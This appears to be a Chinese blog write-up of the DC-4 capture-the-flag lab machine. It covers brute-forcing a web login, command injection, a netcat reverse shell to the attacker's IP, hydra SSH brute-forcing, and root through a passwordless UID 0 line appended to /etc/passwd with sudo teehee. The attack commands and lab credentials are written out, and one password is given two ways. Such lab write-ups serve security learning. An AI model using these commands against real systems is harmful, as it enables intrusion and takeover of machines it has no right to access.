Vulhub 练习 DC-4靶机完整复现

2024-03-14 1,042 0

1.工具

kali:攻击机 IP地址:192.168.200.4

DC-4:靶机 IP地址:暂时未知

2.注意

这里搭建环境两台机器应该选用同类的网络连接方式:这里两台的连接方式为模式

二、信息收集

1.主机发现

找寻同网段下存活的主机(可以根据DC-4的MAC地址看扫描出来的IP地址)

arp-scan -l  #第一种方式

Vulhub 练习 DC-4靶机完整复现插图

nmap -sP 192.168.200.0/24 -T4 # 第二种方式

Vulhub 练习 DC-4靶机完整复现插图1

2.端口扫描

查看此主机开放了哪些可以利用的端口信息

nmap -sV -p-  192.168.200.9

Vulhub 练习 DC-4靶机完整复现插图2

3.后台目录扫描

Vulhub 练习 DC-4靶机完整复现插图3

4.网站指纹

通过以下两种方式可以准确知道网站的框架信息

①先登录网页,利用火狐插件查看

Vulhub 练习 DC-4靶机完整复现插图4

利用kali中的指纹识别命令whatweb扫描

Vulhub 练习 DC-4靶机完整复现插图5

网页提示信息是需要以admin用户进行登录的,那么现在只需要搞到密码就行

Vulhub 练习 DC-4靶机完整复现插图6

3.爆破密码

①暴力破解

Vulhub 练习 DC-4靶机完整复现插图7

得知password:happy

点击对应单选项,然后RUN发现是执行了每种ls指令,用BURP抓包

Vulhub 练习 DC-4靶机完整复现插图8

linux中的操作指令

Vulhub 练习 DC-4靶机完整复现插图9

试试其他经典指令,比如whoami、ip addr这种的

看不到明显的信息,倒是可以知道此指令是可以执行的(页面200)

Vulhub 练习 DC-4靶机完整复现插图10

还有一种就是在前端代码中寻找RUN时执行的对应指令,修改

尝试修改一下前端指令

Vulhub 练习 DC-4靶机完整复现插图11

一样的效果

Vulhub 练习 DC-4靶机完整复现插图12

三、反弹shell

1、首先在kali当中,使用nc进行端口监听

nc -lvvp 8899

Vulhub 练习 DC-4靶机完整复现插图13

2、修改命令 ,修改完后点击Go即可

nc 192.168.200.3 8899 -e /bin/bash 
#nc命令使用的是kali渗透机的ip地址,端口号需要和你上方nc监听端口一致

Vulhub 练习 DC-4靶机完整复现插图14

3、回到kali,这是低权限用户

Vulhub 练习 DC-4靶机完整复现插图15

4.使用python的交互模式

python -c 'import pty;pty.spawn("/bin/bash")'

方便我们操作,避免因为退出而导致需要重新或许使用nc反弹shell
应该是三个人名:charles jim sam

经查看old-passowrd.bak是一个密码文件,只有jim下有东西,其他的两个目录下都为空

Vulhub 练习 DC-4靶机完整复现插图16

这是test.sh中的句子翻译,应该是暴力破解,而密码文件应该就在同级目录的那个文件当中

Vulhub 练习 DC-4靶机完整复现插图17

5、破解jim用户密码

,把old-passowrd.bak复制到kali中,使用hydra进行爆破,

hydra -l jim -P /home/kali/123.txt  ssh://192.168.200.9

需要等几分钟,得到密码

Vulhub 练习 DC-4靶机完整复现插图18

账号:jim

密码:jibr104

[22][ssh] host: 192.168.200.9   login: jim   password: jibril04

6、连接成功

Vulhub 练习 DC-4靶机完整复现插图19

Vulhub 练习 DC-4靶机完整复现插图20

进入 到邮件目录

cd /var/mail 里

Vulhub 练习 DC-4靶机完整复现插图21

结尾可以看到是charles发来的信息,登录密码:^xHhA&hvim0y,切换登陆看看su charles

一些目录被限制了权限,进行提升权限

Vulhub 练习 DC-4靶机完整复现插图22

权限提升

先用sudo -l看看自己有什么权限

teehee这个用户是不需要用密码登录的。

Vulhub 练习 DC-4靶机完整复现插图23

四、提权

添加一个无密码用户,并使用teehee执行写入 passwd中

echo 命令与 sudo 命令配合使用,可以实现向那些只有系统管理员才有权限操作的文件中写入信息命令解释程序(Shell)


添加一个用户,使用teehee执行写入到/etc/passwd中,加入到root权限组中

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
参数解释
#如:admin:x:0:0::/home/admin:/bin/bash
#[用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell]
"-a" 选项的作用等同于 ">>" 命令

Vulhub 练习 DC-4靶机完整复现插图24

无密码直接登录账号admin

Vulhub 练习 DC-4靶机完整复现插图25

文章复现参考:https://blog.csdn.net/liver100day/article/details/117707129


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论